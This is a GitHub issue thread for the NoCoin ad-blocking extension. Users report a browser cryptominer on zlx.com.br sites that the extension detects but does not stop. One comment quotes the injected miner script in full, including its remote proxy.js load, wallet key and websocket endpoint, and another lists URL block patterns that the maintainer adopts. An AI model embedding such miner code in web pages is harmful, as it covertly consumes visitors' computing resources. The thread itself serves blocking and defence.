### ISSUE TITLE
Not blocking http://fileproject.zlx.com.br despite detecting the miner

### ISSUE THREAD

**Issue by lokinmodar** [keraf/NoCoin#153]
The icon shows it detected the coin miner but the high CPU activity continues

https://pastebin.com/d5yr2tcm

**Comment by retaineverythin** [comment]
the same happens to me, but different website, since accidentaly clicked on “not blocking”

**Comment by Firminator** [comment]
Looks like Punchsub.com / net ( https://github.com/keraf/NoCoin/issues/156 )

<script src="https://punchsub.com/proxy.js"></script>
<script>
        var miner = new Client.Anonymous('etnjxv8zwiaWw7QPkF5QrCBFN8YA6K1FCVtVApFNaRBJWwgYjzdkovYV2Mc4GiwQPL5Jf3daXLCuaL82YgNVGi7z2vtih2cHE9', {throttle: 0.7});
        Client.CONFIG.WEBSOCKET_SHARDS = [["wss://proxy4.zlx.com.br/punchsub"]];

        // Only start on non-mobile devices and if not opted-out
        // in the last 14400 seconds (4 hours):
        if (!miner.isMobile() && !miner.didOptOut(14400)) {
                miner.start();
        }
</script>

**Comment by lokinmodar** [comment]
Yeah, the code hints an "opt-out" possibility but the site never shows it. The miner just starts eating 99% of the CPU usage. Very intrusive.

**Comment by Firminator** [comment]
*://chmproxy.bid/lib/*
*://*.chmproxy.bid/lib/*
ws://proxy4.zlx.com.br/*
wss://proxy5.zlx.com.br/*
ws://*.zlx.com.br/proxy*
wss://*.zlx.com.br/proxy*

**Comment by Firminator** [comment]
This would cover punchsub, fileproject.zlx.com.br and other zlx.com.br sites.

zlx is a hoster?! (are they?)
https://whois.domaintools.com/zlx.com.br doesn't show anything, so best bet is that they have been compromised and someone put up mining scripts and re-configured the backend infrastructure to accomodate mining activity.

**Comment by Firminator** [comment]
Last updated today by Carlos Eduardo Sobieray

**Comment by keraf** [comment]
Should be blocked now, thanks!
